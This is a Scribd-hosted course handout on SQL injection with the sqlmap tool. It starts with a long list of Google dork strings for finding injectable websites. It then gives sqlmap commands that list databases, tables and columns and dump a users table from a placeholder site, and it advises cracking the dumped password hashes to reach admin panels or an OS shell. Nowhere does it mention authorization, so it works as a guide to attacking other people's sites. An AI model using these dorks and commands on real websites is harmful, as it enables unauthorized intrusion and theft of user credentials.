Scribd
Upload
48 views

Topic 6b - Web Application SQL Injection Testing - Using Sqmap

Sqlmap is a Python tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. Given a URL, it can find database names, tables, columns, extract data, and even get remote code execution under certain conditions by exploiting SQL injection vulnerabilities.

Uploaded by

rojaluteshi28
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
48 views

Topic 6b - Web Application SQL Injection Testing - Using Sqmap

Sqlmap is a Python tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. Given a URL, it can find database names, tables, columns, extract data, and even get remote code execution under certain conditions by exploiting SQL injection vulnerabilities.

Uploaded by

rojaluteshi28
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 10

Hacking Web Applications: Sql injection using Sqlmap

Sqlmap
 Sqlmap is one of the most popular and powerful sql injection automation tool out
there.
 Given a vulnerable http request url, sqlmap can exploit the remote database and do
a lot of hacking like extracting database names, tables, columns, all the data
in the tables etc.
 It can even read and write files on the remote file system under certain
conditions.
 Written in python it is one of the most powerful hacking tools out there.
 Sqlmap is the metasploit of sql injections.

 Sqlmap is included in pen testing linux tools like kali linux, backtrack,
backbox etc.

 On other operating systems, it can be simply downloaded from the following url
http://sqlmap.org/.

 Since its written in python, first you have to install python on your system if using
Windows

Step 1: Find a Vulnerable Website


 This is usually the toughest bit and takes longer than any other steps.
 Those who know how to use Google Dorks knows this already, but in case you
don’t I have put together a number of strings that you can search in Google.
 Just copy paste any of the lines in Google and Google will show you a number of
search results.

1|Page
Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable
website
Examples

Google Dork string Column Google Dork string Google Dork string Column
1 Column 2 3

inurl:item_id= inurl:review.php?id= inurl:hosting_info.php?id=

inurl:newsid= inurl:iniziativa.php?in= inurl:gallery.php?id=

2|Page
inurl:trainers.php?id= inurl:curriculum.php?id= inurl:rub.php?idr=

inurl:news-full.php?id= inurl:labels.php?id= inurl:view_faq.php?id=

inurl:news_display.php?getid= inurl:story.php?id= inurl:artikelinfo.php?id=

inurl:index2.php?option= inurl:look.php?ID= inurl:detail.php?ID=

inurl:readnews.php?id= inurl:newsone.php?id= inurl:index.php?=

inurl:top10.php?cat= inurl:aboutbook.php?id= inurl:profile_view.php?id=

inurl:newsone.php?id= inurl:material.php?id= inurl:category.php?id=

inurl:event.php?id= inurl:opinions.php?id= inurl:publications.php?id=

inurl:product-item.php?id= inurl:announce.php?id= inurl:fellows.php?id=

inurl:sql.php?id= inurl:rub.php?idr= inurl:downloads_info.php?id=

inurl:index.php?catid= inurl:galeri_info.php?l= inurl:prod_info.php?id=

inurl:news.php?catid= inurl:tekst.php?idt= inurl:shop.php?do=part&id=

3|Page
inurl:index.php?id= inurl:newscat.php?id= inurl:productinfo.php?id=

inurl:newsticker_info.php
inurl:news.php?id= inurl:collectionitem.php?id=
?idn=

inurl:index.php?id= inurl:rubrika.php?idr= inurl:band_info.php?id=

inurl:trainers.php?id= inurl:rubp.php?idr= inurl:product.php?id=

inurl:buy.php?category= inurl:offer.php?idf= inurl:releases.php?id=

inurl:article.php?ID= inurl:art.php?idm= inurl:ray.php?id=

inurl:play_old.php?id= inurl:title.php?id= inurl:produit.php?id=

inurl:declaration_more.php?de
inurl:news_view.php?id= inurl:pop.php?id=
cl_id=

inurl:select_biblio.php?id
inurl:pageid= inurl:shopping.php?id=
=

inurl:games.php?id= inurl:humor.php?id= inurl:productdetail.php?id=

inurl:page.php?file= inurl:aboutbook.php?id= inurl:post.php?id=

4|Page
inurl:ogl_inet.php?ogl_id
inurl:newsDetail.php?id= inurl:viewshowdetail.php?id=
=

inurl:fiche_spectacle.php?
inurl:gallery.php?id= inurl:clubpage.php?id=
id=

inurl:communique_detail.
inurl:article.php?id= inurl:memberInfo.php?id=
php?id=

inurl:show.php?id= inurl:sem.php3?id= inurl:section.php?id=

inurl:staff_id= inurl:kategorie.php4?id= inurl:theme.php?id=

inurl:newsitem.php?num= inurl:news.php?id= inurl:page.php?id=

inurl:shredder-
inurl:readnews.php?id= inurl:index.php?id=
categories.php?id=

inurl:top10.php?cat= inurl:faq2.php?id= inurl:tradeCategory.php?id=

inurl:product_ranges_view.php?
inurl:historialeer.php?num= inurl:show_an.php?id=
ID=

inurl:reagir.php?num= inurl:preview.php?id= inurl:shop_category.php?id=

5|Page
inurl:Stray-Questions-
inurl:loadpsb.php?id= inurl:transcript.php?id=
View.php?num=

inurl:forum_bds.php?num= inurl:opinions.php?id= inurl:channel_id=

inurl:game.php?id= inurl:spr.php?id= inurl:aboutbook.php?id=

inurl:view_product.php?id= inurl:pages.php?id= inurl:preview.php?id=

inurl:newsone.php?id= inurl:announce.php?id= inurl:loadpsb.php?id=

inurl:sw_comment.php?id= inurl:clanek.php4?id= inurl:pages.php?id=

inurl:news.php?id= inurl:participant.php?id=

inurl:avd_start.php?avd= inurl:download.php?id=

inurl:event.php?id= inurl:main.php?id=

inurl:product-item.php?id= inurl:review.php?id=

inurl:sql.php?id= inurl:chappies.php?id=

6|Page
inurl:material.php?id= inurl:read.php?id=

inurl:clanek.php4?id= inurl:prod_detail.php?id=

inurl:announce.php?id= inurl:viewphoto.php?id=

inurl:chappies.php?id= inurl:article.php?id=

inurl:read.php?id= inurl:person.php?id=

inurl:viewapp.php?id= inurl:productinfo.php?id=

inurl:viewphoto.php?id= inurl:showimg.php?id=

inurl:rub.php?idr= inurl:view.php?id=

inurl:galeri_info.php?l= inurl:website.php?id=

Discover Databases

Once sqlmap confirms that a remote url is vulnerable to sql injection and is exploitable
the next step is to find out the names of the databases that exist on the remote
system.

The "--dbs" option is used to get the database list.


7|Page
The output shows the existing databases on the remote system.

Find tables in a particular database

Now its time to find out what tables exist in a particular database. Lets say the
database of interest over here is 'safecosmetics'

Command

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D safecosmetics

Get columns of a table

Now that we have the list of tables with us, it would be a good idea to get the columns
of some important table.

Lets say the table is 'users' and it contains the username and password.

8|Page
$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D safecosmetics -T users

Get data from a table

Now comes the most interesting part, of extracting the data from the table.

The command would be

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D safecosmetics -T users

9|Page
The above command will simply dump the data of the particular table, very much like
the mysqldump command.
The output might look similar to this

 The hash column seems to have the password hash. Try cracking the hash and then you
would get the login details rightaway.
 sqlmap will create a csv file containing the dump data for easy analysis.
 So far we have been able to collect a lot of information from the remote database using
sqlmap
 Its almost like having direct access to remote database through a client like
phpmyadmin.
 In real scenarios hackers would try to gain a higher level to access to the system.
 For this, they would try to crack the password hashes and try to login through the admin
panel. Or they would try to get an os shell using sqlmap.

10 | P a g e

You might also like